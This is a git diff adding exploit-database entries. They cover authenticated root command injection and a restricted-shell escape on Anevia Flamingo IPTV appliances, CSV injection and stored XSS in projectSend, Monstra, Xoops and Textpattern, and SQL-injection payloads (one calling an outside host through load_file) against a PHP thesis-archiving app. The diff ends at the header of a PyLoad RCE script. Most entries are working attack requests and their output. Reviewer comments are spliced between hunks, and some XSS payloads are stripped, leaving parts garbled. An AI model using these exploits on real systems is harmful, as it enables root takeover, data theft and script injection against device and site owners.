diff --git a/exploits/hardware/remote/51514.txt b/exploits/hardware/remote/51514.txt
new file mode 100644
index 000000000..b16b7b679
--- /dev/null
+++ b/exploits/hardware/remote/51514.txt
@@ -0,0 +1,60 @@
+Exploit Title: Anevia Flamingo XS 3.6.5 - Authenticated Root Remote Code Execution
+Exploit Author: LiquidWorm
+Vendor: Ateme
+Product web page: https://www.ateme.com
+Affected version: 3.6.5
+ Hardware revision: 1.1
+ SoapLive 2.4.0
+ SoapSystem 1.3.1
+
+Summary: Flamingo XL, a new modular and high-density IPTV head-end
+product for hospitality and corporate markets. Flamingo XL captures
+live TV and radio content from satellite, cable, digital terrestrial
+and analog sources before streaming it over IP networks to STBs, PCs
+or other IP-connected devices. The Flamingo XL is based upon a modular
+4U rack hardware platform that allows hospitality and corporate video
+service providers to deliver a mix of channels from various sources
+over internal IP networks.
+
+Desc: The affected device suffers from authenticated remote code
+execution vulnerability. A remote attacker can exploit this issue
+and execute arbitrary system commands granting her system access
+with root privileges.
+
+Tested on: GNU/Linux 3.14.29 (x86_64)
+ Apache/2.2.22 (Debian)
+ PHP/5.6.0-0anevia2
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+ @zeroscience
+
+
+Advisory ID: ZSL-2023-5778
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5778.php
+
+
+13.04.2023
+
+--
+
+
+$ curl -sL "http://192.168.1.1/admin/time.php" -H "Cookie: PHPSESSID=o4pan20dtnfb239trffu06pid4" -d "ntp_hosts%5B%5D=&ntp_hosts%5B%5D=%60id%60&ntp_address=&update=Apply&request=ntp" |findstr www-data
+ uid=33(www-data)
+
+ gid=33(www-data)
+
+ groups=33(www-data),6(disk),25(floppy)
+
+
+
+---
+
+
+$ curl -sL "http://192.168.1.1/admin/time.php" -H "Cookie: PHPSESSID=o4pan20dtnfb239trffu06pid4" -d "ntp_hosts%5B%5D=&ntp_hosts%5B%5D=%60sudo%20id%60&ntp_address=&update=Apply&request=ntp" |findstr root
+ uid=0(root)
+
+ gid=0(root)
+
+ groups=0(root)
+ 
\ No newline at end of file
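Review bot: The header names the product Flamingo XS 3.6.5, yet the Summary paragraph describes the Flamingo XL (the 4U rack platform) from start to finish, so a reader cannot tell whether the text was copied from the sibling XL advisories in this commit or whether XS and XL genuinely share that description; either `Summary: Flamingo XS, ...` or a sentence saying the two models share the platform would settle it. The advisory also records no vendor response, fixed version or workaround, and the matching files_exploits.csv row for 51514 leaves the CVE/OSVDB column empty, so an operator triaging one of these appliances learns from the commit only that the admin/time.php NTP host fields reach a shell with root rights and nothing about whether an update exists. The one defensive statement the transcript supports is that the issue requires a valid admin session, so restricting who can reach the admin interface is the interim control; saying so explicitly would make the report actionable.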
diff --git a/exploits/hardware/remote/51515.txt b/exploits/hardware/remote/51515.txt
new file mode 100644
index 000000000..2d16d1ef8
--- /dev/null
+++ b/exploits/hardware/remote/51515.txt
@@ -0,0 +1,99 @@
+Exploit Title: Anevia Flamingo XL 3.6.20 - Authenticated Root Remote Code Execution
+Exploit Author: LiquidWorm
+Vendor: Ateme
+Product web page: https://www.ateme.com
+Affected version: 3.6.20, 3.2.9
+ Hardware revision 1.1, 1.0
+ SoapLive 2.4.1, 2.0.3
+ SoapSystem 1.3.1
+
+Summary: Flamingo XL, a new modular and high-density IPTV head-end
+product for hospitality and corporate markets. Flamingo XL captures
+live TV and radio content from satellite, cable, digital terrestrial
+and analog sources before streaming it over IP networks to STBs, PCs
+or other IP-connected devices. The Flamingo XL is based upon a modular
+4U rack hardware platform that allows hospitality and corporate video
+service providers to deliver a mix of channels from various sources
+over internal IP networks.
+
+Desc: The affected device suffers from authenticated remote code
+execution vulnerability. A remote attacker can exploit this issue
+and execute arbitrary system commands granting her system access
+with root privileges.
+
+Tested on: GNU/Linux 3.1.4 (x86_64)
+ Apache/2.2.15 (Unix)
+ mod_ssl/2.2.15
+ OpenSSL/0.9.8g
+ DAV/2
+ PHP/5.3.6
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+ @zeroscience
+
+
+Advisory ID: ZSL-2023-5779
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5779.php
+
+
+13.04.2023
+
+--
+
+
+> curl -vL http://192.168.1.1/admin/time.php -H "Cookie: PHPSESSID=i3nu7de9vv0q9pi4a8eg8v71b4" -d "ntp=`id`&request=ntp&update=Sync" |findstr root
+ % Total % Received % Xferd Average Speed Time Time Time Current
+ Dload Upload Total Spent Left Speed
+ 0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0* Trying 192.168.1.1:80...
+* Connected to 192.168.1.1 (192.168.1.1) port 80 (#0)
+> POST /admin/time.php HTTP/1.1
+> Host: 192.168.1.1
+> User-Agent: curl/8.0.1
+> Accept: */*
+> Cookie: PHPSESSID=i3nu7de9vv0q9pi4a8eg8v71b4
+> Content-Length: 32
+> Content-Type: application/x-www-form-urlencoded
+>
+} [32 bytes data]
+100 32 0 0 100 32 0 25 0:00:01 0:00:01 --:--:-- 25< HTTP/1.1 302 Found
+< Date: Thu, 13 Apr 2023 23:54:15 GMT
+< Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8g DAV/2 PHP/5.3.6
+< X-Powered-By: PHP/5.3.6
+< Expires: Thu, 19 Nov 1981 08:52:00 GMT
+< Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
+< Pragma: no-cache
+* Please rewind output before next send
+< Location: /admin/time.php
+< Transfer-Encoding: chunked
+< Content-Type: text/html
+<
+* Ignoring the response-body
+{ [5 bytes data]
+100 32 0 0 100 32 0 19 0:00:01 0:00:01 --:--:-- 19
+* Connection #0 to host 192.168.1.1 left intact
+* Issue another request to this URL: 'http://192.168.1.1/admin/time.php'
+* Switch from POST to GET
+* Found bundle for host: 0x1de6c6321b0 [serially]
+* Re-using existing connection #0 with host 192.168.1.1
+> POST /admin/time.php HTTP/1.1
+> Host: 192.168.1.1
+> User-Agent: curl/8.0.1
+> Accept: */*
+> Cookie: PHPSESSID=i3nu7de9vv0q9pi4a8eg8v71b4
+>
+< HTTP/1.1 200 OK
+< Date: Thu, 13 Apr 2023 23:54:17 GMT
+< Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8g DAV/2 PHP/5.3.6
+< X-Powered-By: PHP/5.3.6
+< Expires: Thu, 19 Nov 1981 08:52:00 GMT
+< Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
+< Pragma: no-cache
+< Transfer-Encoding: chunked
+< Content-Type: text/html
+<
+{ [13853 bytes data]
+14 Apr 03:54:17 ntpdate[8964]: can't find host uid=0(root) <----------------------<<
+14 Apr 03:54:17 ntpdate[8964]: can't find host gid=0(root) <----------------------<<
+100 33896 0 33896 0 0 14891 0 --:--:-- 0:00:02 --:--:-- 99k
+* Connection #0 to host 192.168.1.1 left intact
\ No newline at end of file
diff --git a/exploits/hardware/remote/51516.txt b/exploits/hardware/remote/51516.txt
new file mode 100644
index 000000000..6954dc68c
--- /dev/null
+++ b/exploits/hardware/remote/51516.txt
@@ -0,0 +1,198 @@
+Exploit Title: Anevia Flamingo XL 3.2.9 - Remote Root Jailbreak
+Exploit Author: LiquidWorm
+Product web page: https://www.ateme.com
+Affected version: 3.2.9
+ Hardware revision 1.0
+ SoapLive 2.0.3
+
+Summary: Flamingo XL, a new modular and high-density IPTV head-end
+product for hospitality and corporate markets. Flamingo XL captures
+live TV and radio content from satellite, cable, digital terrestrial
+and analog sources before streaming it over IP networks to STBs, PCs
+or other IP-connected devices. The Flamingo XL is based upon a modular
+4U rack hardware platform that allows hospitality and corporate video
+service providers to deliver a mix of channels from various sources
+over internal IP networks.
+
+Desc: Once the admin establishes a secure shell session, she gets
+dropped into a sandboxed environment using the login binary that
+allows specific set of commands. One of those commands that can be
+exploited to escape the jailed shell is traceroute. A remote attacker
+can breakout of the restricted environment and have full root access
+to the device.
+
+Tested on: GNU/Linux 3.1.4 (x86_64)
+ Apache/2.2.15 (Unix)
+ mod_ssl/2.2.15
+ OpenSSL/0.9.8g
+ DAV/2
+ PHP/5.3.6
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+ @zeroscience
+
+
+Advisory ID: ZSL-2023-5780
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5780.php
+
+
+13.04.2023
+
+--
+
+
+$ ssh -o KexAlgorithms=+diffie-hellman-group1-sha1 root@192.168.1.1
+The authenticity of host '192.168.1.1 (192.168.1.1)' can't be established.
+RSA key fingerprint is SHA256:E6TaDYkszZMbS555THYEPVzv1DpzYrwJzW1TM4+ZSLk.
+Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
+Warning: Permanently added '192.168.1.1' (RSA) to the list of known hosts.
+Anevia Flamingo XL
+root@192.168.1.1's password:
+Primary-XL> help
+available commands:
+ bonding
+ config
+ date
+ dns
+ enable
+ ethconfig
+ exit
+ exp
+ firewall
+ help
+ hostname
+ http
+ igmpq
+ imp
+ ipconfig
+ license
+ log
+ mail
+ passwd
+ persistent_logs
+ ping
+ reboot
+ reset
+ route
+ serial
+ settings
+ sslconfig
+ tcpdump
+ timezone
+ traceroute
+ upgrade
+ uptime
+ version
+ vlanconfig
+
+Primary-XL> tcpdump ;id
+tcpdump: illegal token: ;
+Primary-XL> id
+unknown command id
+Primary-XL> whoami
+unknown command whoami
+Primary-XL> ping ;id
+ping: ;id: Host name lookup failure
+Primary-XL> traceroute ;id
+BusyBox v1.1.2p2 (2012.04.24-09:33+0000) multi-call binary
+
+Usage: traceroute [-FIldnrv] [-f 1st_ttl] [-m max_ttl] [-p port#] [-q nqueries]
+ [-s src_addr] [-t tos] [-w wait] [-g gateway] [-i iface]
+ [-z pausemsecs] host [data size]
+
+trace the route ip packets follow going to "host"
+Options:
+ -F Set the don't fragment bit
+ -I Use ICMP ECHO instead of UDP datagrams
+ -l Display the ttl value of the returned packet
+ -d Set SO_DEBUG options to socket
+ -n Print hop addresses numerically rather than symbolically
+ -r Bypass the normal routing tables and send directly to a host
+ -v Verbose output
+ -m max_ttl Set the max time-to-live (max number of hops)
+ -p port# Set the base UDP port number used in probes
+ (default is 33434)
+ -q nqueries Set the number of probes per ``ttl'' to nqueries
+ (default is 3)
+ -s src_addr Use the following IP address as the source address
+ -t tos Set the type-of-service in probe packets to the following value
+ (default 0)
+ -w wait Set the time (in seconds) to wait for a response to a probe
+ (default 3 sec)
+ -g Specify a loose source route gateway (8 maximum)
+
+uid=0(root) gid=0(root) groups=0(root)
+Primary-XL> version
+Software Revision: Anevia Flamingo XL v3.2.9
+Hardware Revision: 1.0
+(c) Anevia 2003-2012
+Primary-XL> traceroute ;sh
+...
+...
+whoami
+root
+id
+uid=0(root) gid=0(root) groups=0(root)
+ls -al
+drwxr-xr-x 19 root root 1024 Oct 3 2022 .
+drwxr-xr-x 19 root root 1024 Oct 3 2022 ..
+drwxr-xr-x 2 root root 1024 Oct 21 2013 bin
+drwxrwxrwt 2 root root 40 Oct 3 2022 cores
+drwxr-xr-x 13 root root 27648 May 22 00:53 dev
+drwxr-xr-x 3 root root 1024 Oct 21 2013 emul
+drwxr-xr-x 48 1000 1000 3072 Oct 3 2022 etc
+drwxr-xr-x 3 root root 1024 Oct 3 2022 home
+drwxr-xr-x 11 root root 3072 Oct 21 2013 lib
+lrwxrwxrwx 1 root root 20 Oct 21 2013 lib32 -> /emul/ia32-linux/lib
+lrwxrwxrwx 1 root root 3 Oct 21 2013 lib64 -> lib
+drwx------ 2 root root 12288 Oct 21 2013 lost+found
+drwxr-xr-x 4 root root 1024 Oct 21 2013 mnt
+drwxrwxrwt 2 root root 80 May 22 00:45 php_sessions
+dr-xr-xr-x 177 root root 0 Oct 3 2022 proc
+drwxr-xr-x 4 root root 1024 Oct 21 2013 root
+drwxr-xr-x 2 root root 2048 Oct 21 2013 sbin
+drwxr-xr-x 12 root root 0 Oct 3 2022 sys
+drwxrwxrwt 26 root root 1140 May 22 01:06 tmp
+drwxr-xr-x 10 1000 1000 1024 Oct 21 2013 usr
+drwxr-xr-x 14 root root 1024 Oct 21 2013 var
+
+ls /var/www/admin
+_img configuration.php log_securemedia.php stream_dump.php
+_lang cores_and_logs_management.php login.php stream_services
+_lib dataminer_handshake.php logout.php streaming.php
+_style dvbt.php logs.php support.php
+about.php dvbt_scan.php main.php template
+ajax export.php manager.php time.php
+alarm.php fileprogress.php network.php toto.ts
+alarm_view.php firewall.php pear upload_helper.php
+authentication.php get_config power.php uptime.php
+bridges.php get_enquiry_pending.php read_settings.php usbloader.php
+cam.php get_upgrade_error.php receive_helper.php version.php
+channel.php heartbeat.php rescrambling webradio.php
+channel_xl_list.php include rescrambling.php webtv
+check_state input.php resilience webtv.php
+class js resilience.php xmltv.php
+common license.php restart_service.php
+config_snmp.php log.php set_oem.php
+
+python -c 'import pty; pty.spawn("/bin/bash")'
+root@Primary-XL:/# cd /usr/local/bin
+root@Primary-XL:/usr/local/bin# ls -al login
+-rwxr-xr-x 1 root root 35896 Feb 21 2012 login
+root@Primary-XL:/usr/local/bin# cd ..
+root@Primary-XL:/usr/local# ls commands/
+bonding firewall mail timezone
+config help passwd traceroute
+date hostname persistent_logs upgrade
+dbg-serial http ping uptime
+dbg-set-oem igmpq route version
+dbg-updates-log imp serial vlanconfig
+dns ipconfig settings
+ethconfig license sslconfig
+exp log tcpdump
+root@Primary-XL:/usr/local# exit
+exit
+Primary-XL> enable
+password:
+Primary-XL# ;]
\ No newline at end of file
diff --git a/exploits/php/webapps/51517.txt b/exploits/php/webapps/51517.txt
new file mode 100644
index 000000000..da53e17d2
--- /dev/null
+++ b/exploits/php/webapps/51517.txt
@@ -0,0 +1,19 @@
+Exploit Title: projectSend r1605 - CSV injection
+Version: r1605
+Bugs: CSV Injection
+Technology: PHP
+Vendor URL: https://www.projectsend.org/
+Software Link: https://www.projectsend.org/
+Date of found: 11-06-2023
+Author: Mirabbas Ağalarov
+Tested on: Windows
+
+
+2. Technical Details & POC
+========================================
+Step 1. login as user
+step 2. Go to My Account ( http://localhost/users-edit.php?id=2 )
+step 3. Set name as =calc|a!z|
+step 3. If admin Export action-log as CSV file ,in The computer of admin occurs csv injection and will open calculator ( http://localhost/actions-log.php )
+
+payload: =calc|a!z|
\ No newline at end of file
diff --git a/exploits/php/webapps/51518.txt b/exploits/php/webapps/51518.txt
new file mode 100644
index 000000000..43288613b
--- /dev/null
+++ b/exploits/php/webapps/51518.txt
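Review bot: The header block of 51516.txt omits the `Vendor: Ateme` line that the sibling advisories 51514 and 51515 in this commit carry, so the three files are inconsistent in the metadata a reader uses to match them up; `+Vendor: Ateme` after the `Exploit Author` line would align them. The Desc paragraph names the command that escapes but not why (the transcript suggests the traceroute wrapper hands its argument string to a shell while `tcpdump` and `ping` reject or quote it, which should be stated as the root cause rather than left for the reader to infer), and it records no fix or workaround. The defensive conclusion the transcript does support is that restricted-shell SSH access on the affected firmware has to be treated as full root access, so the SSH credential deserves the same handling as the root password; the advisory would be more useful if it said that.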
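Review bot: The reproduction steps in 51517.txt number two consecutive steps `step 3.`, so the second one (the admin exporting the action log) should read `step 4.`, and the list mixes `Step`/`step` capitalisation. The write-up does not name the application-side defect — that the export writes user-controlled fields verbatim, so a cell beginning with `=` is evaluated by spreadsheet software — nor a fix; the standard remediation of prefixing cells that start with `=`, `+`, `-` or `@` with a single quote (or quoting and escaping the cell) is worth stating so the maintainers have something to act on. `Tested on: Windows` should also name the spreadsheet application that opened the export, since the behaviour depends on the consumer rather than on PHP.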
@@ -0,0 +1,46 @@
+Exploit Title: projectSend r1605 - Stored XSS
+Application: projectSend
+Version: r1605
+Bugs: Stored Xss
+Technology: PHP
+Vendor URL: https://www.projectsend.org/
+Software Link: https://www.projectsend.org/
+Date of found: 11-06-2023
+Author: Mirabbas Ağalarov
+Tested on: Linux
+
+2. Technical Details & POC
+========================================
+
+1. Login as admin
+2. Go to Custom Html/Css/Js (http://localhost/custom-assets.php)
+3. Go to new JS (http://localhost/custom-assets-add.php?language=js)
+4. Set content as alert("xss"); and set public
+5. And Save
+6. Go to http://localhost (logout)
+
+payload: alert("xss")
+
+POST /custom-assets-add.php HTTP/1.1
+Host: localhost
+Content-Length: 171
+Cache-Control: max-age=0
+sec-ch-ua: "Chromium";v="113", "Not-A.Brand";v="24"
+sec-ch-ua-mobile: ?0
+sec-ch-ua-platform: "Linux"
+Upgrade-Insecure-Requests: 1
+Origin: http://localhost
+Content-Type: application/x-www-form-urlencoded
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.127 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Sec-Fetch-Site: same-origin
+Sec-Fetch-Mode: navigate
+Sec-Fetch-User: ?1
+Sec-Fetch-Dest: document
+Referer: http://localhost/custom-assets-add.php?language=js
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Cookie: log_download_started=false; PHPSESSID=7j8g8u9t7khb259ci4fvareg2l
+Connection: close
+
+csrf_token=222b49c5c4a1755c451637f17ef3e7ea8bb5b6ee616293bd73d15d0e608d9dab&language=js&title=test&content=alert%28%22XSS%22%29%3B&enabled=on&location=public&position=head
\ No newline at end of file
diff --git a/exploits/php/webapps/51519.txt b/exploits/php/webapps/51519.txt
new file mode 100644
index 000000000..3837a6c20
--- /dev/null
+++ b/exploits/php/webapps/51519.txt
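Review bot: The steps show an administrator saving JavaScript through the application's own Custom HTML/CSS/JS feature (`custom-assets-add.php?language=js` with `location=public` and `position=head`), which is that feature doing what it is designed to do, and the report never explains what trust boundary is crossed: whether a role below administrator can submit this form, or what an administrator gains by injecting script into a site they already control. Without that, the finding reads as admin self-XSS rather than a vulnerability, and the advisory should state the minimum role that can reach this request, or be withdrawn. The captured request also carries a live-looking `PHPSESSID` and `csrf_token`; they are presumably expired, but advisories conventionally redact such values.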
@@ -0,0 +1,17 @@
+# Exploit Title: Monstra 3.0.4 - Stored Cross-Site Scripting (XSS)
+# Date: 2023-06-13
+# Exploit Author: tmrswrr
+# Vendor Homepage: https://monstra.org/
+# Software Link: https://monstra.org/monstra-3.0.4.zip
+# Version: 3.0.4
+# Tested : https://www.softaculous.com/softaculous/demos/Monstra
+
+
+--- Description ---
+
+1) Login admin panel and go to Pages:
+https://demos3.softaculous.com/Monstraggybvrnbr4/admin/index.php?id=pages
+2) Click edit button and write your payload in the Name field:
+Payload: ">
+3) After save change and will you see alert button
+https://demos3.softaculous.com/Monstraggybvrnbr4/
\ No newline at end of file
diff --git a/exploits/php/webapps/51520.txt b/exploits/php/webapps/51520.txt
new file mode 100644
index 000000000..9c41abcfa
--- /dev/null
+++ b/exploits/php/webapps/51520.txt
@@ -0,0 +1,17 @@
+# Exploit Title: Xoops CMS 2.5.10 - Stored Cross-Site Scripting (XSS) (Authenticated)
+# Date: 2023-06-12
+# Exploit Author: tmrswrr
+# Vendor Homepage: https://xoops.org/
+# Software https://github.com/XOOPS/XoopsCore25/releases/tag/v2.5.10
+# Version: 2.5.10
+# Tested : https://www.softaculous.com/apps/cms/Xoops
+
+
+--- Description ---
+
+1) Login admin panel and click Image Manager , choose Add Category :
+https://demos5.softaculous.com/Xoopshkqdowiwqq/modules/system/admin.php?fct=images
+2) Write your payload in the Category Name field and submit:
+Payload:
+3) After click multiupload , when you move the mouse to the payload name, you will see the alert button
+https://demos5.softaculous.com/Xoopshkqdowiwqq/modules/system/admin.php?fct=images&op=multiupload&imgcat_id=2
\ No newline at end of file
diff --git a/exploits/php/webapps/51521.txt b/exploits/php/webapps/51521.txt
new file mode 100644
index 000000000..e8fd0c7c5
--- /dev/null
+++ b/exploits/php/webapps/51521.txt
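Review bot: The `Payload:` line under step 2 of 51519.txt has lost its content (only `">` survives), and the same happened to the `Payload:` line of 51520.txt on this same line and to the Excerpt payload in 51523.txt further down (both the `2) Write in Excerpt field` step and the `name="Excerpt"` part of the captured request), which looks like markup being stripped when the files were prepared; as committed, none of the three reports can be reproduced from their own steps. Restoring the payload text in a form that survives sanitisation would make the files self-contained. None of the three names the template or the missing output encoding on the application side, and none gives a fixed version, so the maintainers have nothing to act on either; `# Software` in 51520.txt is also missing its `Link:` label that the sibling headers use.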
@@ -0,0 +1,79 @@
+## Exploit Title: Online Thesis Archiving System v1.0 - Multiple-SQLi
+## Author: nu11secur1ty
+## Date: 06.12.2023
+## Vendor: https://github.com/oretnom23
+## Software: https://www.sourcecodester.com/php/15083/online-thesis-archiving-system-using-phpoop-free-source-code.html
+## Reference: https://portswigger.net/web-security/sql-injection
+
+## Description:
+The password parameter appears to be vulnerable to SQL injection
+attacks. The payload '+(select
+load_file('\\\\t5z7nwb485tiyvqzqnv3hp1z3q9jxatyk18tvkj9.tupungerispanski.com\\ock'))+'
+was submitted in the password parameter.
+This payload injects a SQL sub-query that calls MySQL's load_file
+function with a UNC file path that references a URL on an external
+domain. The application interacted with that domain, indicating that
+the injected SQL query was executed. The attacker can dump all
+information from the
+database of this system, and then he can use it for dangerous and
+malicious purposes!
+
+STATUS: HIGH-CRITICAL Vulnerability
+
+[+]Payload:
+```mysql
+---
+Parameter: password (POST)
+ Type: boolean-based blind
+ Title: OR boolean-based blind - WHERE or HAVING clause (NOT)
+ Payload: email=itvBGDRM@burpcollaborator.net&password=v7K!u1n!T7')
+OR NOT 1404=1404-- Eotr
+
+ Type: error-based
+ Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or
+GROUP BY clause (FLOOR)
+ Payload: email=itvBGDRM@burpcollaborator.net&password=v7K!u1n!T7')
+AND (SELECT 5476 FROM(SELECT COUNT(*),CONCAT(0x717a6b6b71,(SELECT
+(ELT(5476=5476,1))),0x71766a7a71,FLOOR(RAND(0)*2))x FROM
+INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- sOUa
+
+ Type: time-based blind
+ Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+ Payload: email=itvBGDRM@burpcollaborator.net&password=v7K!u1n!T7')
+AND (SELECT 6301 FROM (SELECT(SLEEP(15)))MFgI)-- HCqY
+---
+
+```
+
+## Reproduce:
+[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2023/OTAS-v1.0)
+
+## Proof and Exploit:
+[href](https://www.nu11secur1ty.com/2023/06/otas-php-by-oretnom23-v10-multiple-sqli.html)
+
+## Time spend:
+01:15:00
+
+
+--
+System Administrator - Infrastructure Engineer
+Penetration Testing Engineer
+Exploit developer at https://packetstormsecurity.com/
+https://cve.mitre.org/index.htmlhttps://cxsecurity.com/ and
+https://www.exploit-db.com/
+0day Exploit DataBase https://0day.today/
+home page: https://www.nu11secur1ty.com/
+hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
+ nu11secur1ty
+
+
+--
+System Administrator - Infrastructure Engineer
+Penetration Testing Engineer
+Exploit developer at https://packetstormsecurity.com/
+https://cve.mitre.org/index.html
+https://cxsecurity.com/ and https://www.exploit-db.com/
+0day Exploit DataBase https://0day.today/
+home page: https://www.nu11secur1ty.com/
+hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
+ nu11secur1ty
\ No newline at end of file
diff --git a/exploits/php/webapps/51523.txt b/exploits/php/webapps/51523.txt
new file mode 100644
index 000000000..088ea7e6e
--- /dev/null
+++ b/exploits/php/webapps/51523.txt
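Review bot: The trailing e-mail signature is pasted twice with small differences (the first copy fuses two URLs into `https://cve.mitre.org/index.htmlhttps://cxsecurity.com/`), so one copy should be dropped, and `## Time spend:` should read `## Time spent:`. The description says the password parameter is injectable but never names the PHP script or code path that builds the query, and `## Reference:` points at a generic PortSwigger tutorial rather than a vendor or tracker entry, so a reader cannot tell whether this overlaps 50597 (the existing authentication-bypass SQLi for the same application, which the CSV hunk in this commit lists directly above the new row) or is a distinct issue. The pasted sqlmap output also embeds a burpcollaborator.net address and the tester's out-of-band hostname, which are scan artifacts rather than part of the finding and are normally trimmed.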
@@ -0,0 +1,196 @@
+# Exploit Title: Textpattern CMS v4.8.8 - Stored Cross-Site Scripting (XSS) (Authenticated)
+# Date: 2023-06-13
+# Exploit Author: tmrswrr
+# Vendor Homepage: https://textpattern.com/
+# Software Link: https://textpattern.com/file_download/118/textpattern-4.8.8.zip
+# Version: v4.8.8
+# Tested : https://release-demo.textpattern.co/
+
+
+--- Description ---
+
+
+1) Login admin page , choose Content , Articles section :
+https://release-demo.textpattern.co/textpattern/index.php?event=article&ID=2
+2) Write in Excerpt field this payload > ">
+3) Click My Site will you see alert button
+https://release-demo.textpattern.co/index.php?id=2
+
+
+--- Request ---
+
+POST /textpattern/index.php HTTP/2
+Host: release-demo.textpattern.co
+Cookie: txp_login=managing-editor179%2C1673c724813dc43d06d90aff6e69616c; txp_login_public=b7cb169562managing-editor179
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
+Accept: text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: https://release-demo.textpattern.co/
+X-Requested-With: XMLHttpRequest
+Content-Type: multipart/form-data; boundary=---------------------------26516646042700398511941284351
+Content-Length: 4690
+Origin: https://release-demo.textpattern.co
+Dnt: 1
+Sec-Fetch-Dest: empty
+Sec-Fetch-Mode: cors
+Sec-Fetch-Site: same-origin
+Te: trailers
+
+-----------------------------26516646042700398511941284351
+Content-Disposition: form-data; name="ID"
+
+2
+-----------------------------26516646042700398511941284351
+Content-Disposition: form-data; name="event"
+
+article
+-----------------------------26516646042700398511941284351
+Content-Disposition: form-data; name="step"
+
+edit
+-----------------------------26516646042700398511941284351
+Content-Disposition: form-data; name="Title"
+
+hello
+-----------------------------26516646042700398511941284351
+Content-Disposition: form-data; name="textile_body"
+
+1
+-----------------------------26516646042700398511941284351
+Content-Disposition: form-data; name="Body"
+
+hello
+-----------------------------26516646042700398511941284351
+Content-Disposition: form-data; name="textile_excerpt"
+
+1
+-----------------------------26516646042700398511941284351
+Content-Disposition: form-data; name="Excerpt"
+
+">
+-----------------------------26516646042700398511941284351
+Content-Disposition: form-data; name="sPosted"
+
+1686684925
+-----------------------------26516646042700398511941284351
+Content-Disposition: form-data; name="sLastMod"
+
+1686685069
+-----------------------------26516646042700398511941284351
+Content-Disposition: form-data; name="AuthorID"
+
+managing-editor179
+-----------------------------26516646042700398511941284351
+Content-Disposition: form-data; name="LastModID"
+
+managing-editor179
+-----------------------------26516646042700398511941284351
+Content-Disposition: form-data; name="Status"
+
+4
+-----------------------------26516646042700398511941284351
+Content-Disposition: form-data; name="Section"
+
+articles
+-----------------------------26516646042700398511941284351
+Content-Disposition: form-data; name="override_form"
+
+article_listing
+-----------------------------26516646042700398511941284351
+Content-Disposition: form-data; name="year"
+
+2023
+-----------------------------26516646042700398511941284351
+Content-Disposition: form-data; name="month"
+
+06
+-----------------------------26516646042700398511941284351
+Content-Disposition: form-data; name="day"
+
+13
+-----------------------------26516646042700398511941284351
+Content-Disposition: form-data; name="hour"
+
+19
+-----------------------------26516646042700398511941284351
+Content-Disposition: form-data; name="minute"
+
+35
+-----------------------------26516646042700398511941284351
+Content-Disposition: form-data; name="second"
+
+25
+-----------------------------26516646042700398511941284351
+Content-Disposition: form-data; name="exp_year"
+
+
+-----------------------------26516646042700398511941284351
+Content-Disposition: form-data; name="exp_month"
+
+
+-----------------------------26516646042700398511941284351
+Content-Disposition: form-data; name="exp_day"
+
+
+-----------------------------26516646042700398511941284351
+Content-Disposition: form-data; name="exp_hour"
+
+
+-----------------------------26516646042700398511941284351
+Content-Disposition: form-data; name="exp_minute"
+
+
+-----------------------------26516646042700398511941284351
+Content-Disposition: form-data; name="exp_second"
+
+
+-----------------------------26516646042700398511941284351
+Content-Disposition: form-data; name="sExpires"
+
+
+-----------------------------26516646042700398511941284351
+Content-Disposition: form-data; name="Category1"
+
+hope-for-the-future
+-----------------------------26516646042700398511941284351
+Content-Disposition: form-data; name="Category2"
+
+hope-for-the-future
+-----------------------------26516646042700398511941284351
+Content-Disposition: form-data; name="url_title"
+
+alert1
+-----------------------------26516646042700398511941284351
+Content-Disposition: form-data; name="description"
+
+
+-----------------------------26516646042700398511941284351
+Content-Disposition: form-data; name="Keywords"
+
+
+-----------------------------26516646042700398511941284351
+Content-Disposition: form-data; name="Image"
+
+
+-----------------------------26516646042700398511941284351
+Content-Disposition: form-data; name="custom_1"
+
+
+-----------------------------26516646042700398511941284351
+Content-Disposition: form-data; name="custom_2"
+
+
+-----------------------------26516646042700398511941284351
+Content-Disposition: form-data; name="save"
+
+Save
+-----------------------------26516646042700398511941284351
+Content-Disposition: form-data; name="app_mode"
+
+async
+-----------------------------26516646042700398511941284351
+Content-Disposition: form-data; name="_txp_token"
+
+fb6da7f582d0606882462bc4ed72238e
+-----------------------------26516646042700398511941284351--
\ No newline at end of file
diff --git a/exploits/python/webapps/51522.py b/exploits/python/webapps/51522.py
new file mode 100755
index 000000000..3eaa77f04
--- /dev/null
+++ b/exploits/python/webapps/51522.py
@@ -0,0 +1,53 @@
+# Exploit Title: PyLoad 0.5.0 - Pre-auth Remote Code Execution (RCE)
+# Date: 06-10-2023
+# Credits: bAu @bauh0lz
+# Exploit Author: Gabriel Lima (0xGabe)
+# Vendor Homepage: https://pyload.net/
+# Software Link: https://github.com/pyload/pyload
+# Version: 0.5.0
+# Tested on: Ubuntu 20.04.6
+# CVE: CVE-2023-0297
+
+import requests, argparse
+
